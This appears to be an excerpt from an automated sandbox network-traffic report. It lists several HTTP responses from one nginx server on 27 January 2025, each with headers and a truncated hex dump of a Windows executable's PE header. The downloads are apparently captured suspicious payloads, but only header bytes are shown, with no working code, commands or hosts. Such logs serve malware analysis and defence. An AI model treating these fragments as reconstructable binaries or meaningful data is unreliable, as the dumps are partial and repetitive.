                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 1501214Last-Modified: Fri, 24 Jan 2025 15:07:02 GMTConnection: keep-aliveETag: "6793ac96-16e81e"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 bd ea e2 3a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 50 01 00 00 24 01 00 00 00 00 00 78 64 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 20 03 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 9e 0f 00 00 00 10 02 00 d4 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 e3 01 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 e8 0b 00 00 00 60 01 00 00 0c 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 0d 00 00 00 70 01 00 00 0e 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 4c 57 00 00 00 80 01 00 00 00 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9e 0f 00 00 00 e0 01 00 00 10 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 f0 01 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 00 02 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 d4 02 01 00 00 10 02 00 00 04 01 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 00 00 00 00 00 26 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 353280Last-Modified: Sat, 25 Jan 2025 18:47:10 GMTConnection: keep-aliveETag: "679531ae-56400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 11 56 3d e7 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 50 03 00 00 0a 00 00 00 00 00 00 fe 6d 03 00 00 20 00 00 00 80 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 05 00 00 04 00 00 62 26 04 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 b0 6d 03 00 4b 00 00 00 00 80 03 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 6e 6d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 4e 03 00 00 20 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2e 06 00 00 00 80 03 00 00 08 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 53 00 00 00 00 28 04 02 00 00 c0 03 00 00 06 02 00 00 5e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 353280Last-Modified: Sat, 25 Jan 2025 18:47:10 GMTConnection: keep-aliveETag: "679531ae-56400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 11 56 3d e7 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 50 03 00 00 0a 00 00 00 00 00 00 fe 6d 03 00 00 20 00 00 00 80 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 05 00 00 04 00 00 62 26 04 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 b0 6d 03 00 4b 00 00 00 00 80 03 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 6e 6d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 4e 03 00 00 20 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2e 06 00 00 00 80 03 00 00 08 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 53 00 00 00 00 28 04 02 00 00 c0 03 00 00 06 02 00 00 5e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 8251392Last-Modified: Wed, 15 Jan 2025 19:13:17 GMTConnection: keep-aliveETag: "678808cd-7de800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 db 63 a2 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 10 5f 00 00 d8 7d 00 00 0c 32 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 b0 00 00 10 00 00 4c 7c 7e 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 ae 00 d8 46 00 00 00 40 af 00 e8 5c 00 00 00 10 76 00 9c ee 02 00 00 00 00 00 00 00 00 00 00 a0 af 00 6c 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 19 74 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c e0 ae 00 40 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 0a 5f 00 00 10 00 00 00 10 5f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 60 04 01 00 00 20 5f 00 00 06 01 00 00 20 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 e0 dc 15 00 00 30 60 00 00 de 15 00 00 26 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 9c ee 02 00 00 10 76 00 00 f0 02 00 00 04 76 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 14 b9 03 00 00 00 79 00 00 ba 03 00 00 f4 78 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 e0 0a 32 00 00 c0 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 d8 46 00 00 00 d0 ae 00 00 48 00 00 00 ae 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 20 af 00 00 02 00 00 00 f6 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 30 af 00 00 02 00 00 00 f8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5c 00 00 00 40 af 00 e8 5c 00 00 00 fa 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 8e 00 00 00 a0 af 00 00 90 00 00 00 58 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 353280Last-Modified: Sat, 25 Jan 2025 18:47:11 GMTConnection: keep-aliveETag: "679531af-56400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 11 56 3d e7 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 50 03 00 00 0a 00 00 00 00 00 00 fe 6d 03 00 00 20 00 00 00 80 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 05 00 00 04 00 00 62 26 04 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 b0 6d 03 00 4b 00 00 00 00 80 03 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 6e 6d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 4e 03 00 00 20 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2e 06 00 00 00 80 03 00 00 08 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 53 00 00 00 00 28 04 02 00 00 c0 03 00 00 06 02 00 00 5e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 905203Last-Modified: Sat, 25 Jan 2025 19:48:26 GMTConnection: keep-aliveETag: "6795400a-dcff3"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 c0 10 00 00 04 00 00 7d 40 0e 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 16 a4 00 00 00 00 00 00 00 00 00 00 33 73 0d 00 c0 5c 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 16 a4 00 00 00 00 10 00 00 a6 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 b0 10 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 1387520Last-Modified: Thu, 09 Jan 2025 21:00:28 GMTConnection: keep-aliveETag: "678038ec-152c00"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 ac 0a 00 00 7c 0a 00 00 00 00 00 30 ba 0a 00 00 10 00 00 00 c0 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 16 00 00 04 00 00 aa db 0d 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 f0 0a 00 32 27 00 00 00 e0 0b 00 a0 32 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 70 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 00 b0 0a 00 00 10 00 00 00 ac 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 00 20 00 00 00 c0 0a 00 00 1e 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 00 10 00 00 00 e0 0a 00 00 10 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 00 30 00 00 00 f0 0a 00 00 28 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 00 10 00 00 00 20 0b 00 00 10 00 00 00 f6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 00 b0 00 00 00 30 0b 00 00 02 00 00 00 f6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 a0 32 0a 00 00 e0 0b 00 00 34 0a 00 00 f8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 0d 00 00 00 00 00 00 74 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 21504Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-5400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a 58 21 9a 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 48 00 00 00 0a 00 00 00 00 00 00 3a 66 00 00 00 20 00 00 00 